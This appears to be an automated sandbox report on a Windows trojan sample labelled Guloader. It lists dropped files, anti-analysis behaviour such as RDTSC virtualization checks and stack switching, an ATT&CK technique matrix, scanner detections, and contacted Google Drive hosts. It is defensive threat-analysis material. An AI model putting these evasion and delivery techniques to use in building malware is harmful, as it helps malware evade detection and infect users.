0_2_72A42F8E

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

File created: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	API/Special instruction interceptor: Address: 371B13C
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	API/Special instruction interceptor: Address: 250B13C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	RDTSC instruction interceptor: First address: 36F59AF second address: 36F59AF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA2CD0C010Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	RDTSC instruction interceptor: First address: 24E59AF second address: 24E59AF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA2CD0C49EAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe TID: 2680

Thread sleep time: -250000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF

Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*w

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	API call chain: ExitProcess graph end node			graph_0-3983
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	API call chain: ExitProcess graph end node			graph_0-4158

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Code function: 0_2_72A41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_72A41A98

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

Process created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"

Jump to behavior

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe

0_2_00403348

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
eAvqHiIsgR.exe	61%	ReversingLabs	Win32.Trojan.Guloader
eAvqHiIsgR.exe	100%	Avira	TR/Injector.csnhe

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://drive.google.comZT	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	172.217.19.174	true	false		high
drive.usercontent.google.com	142.250.181.33	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/I	eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/J	eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	eAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	false		high
http://nsis.sf.net/NSIS_Error	eAvqHiIsgR.exe	false		high
https://translate.google.com/translate_a/element.js	eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/A	eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/ertificates	eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/Pbw	eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/r	eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	eAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp	false		high
https://drive.usercontent.google.com/	eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	eAvqHiIsgR.exe	false		high
https://drive.google.comZT	eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
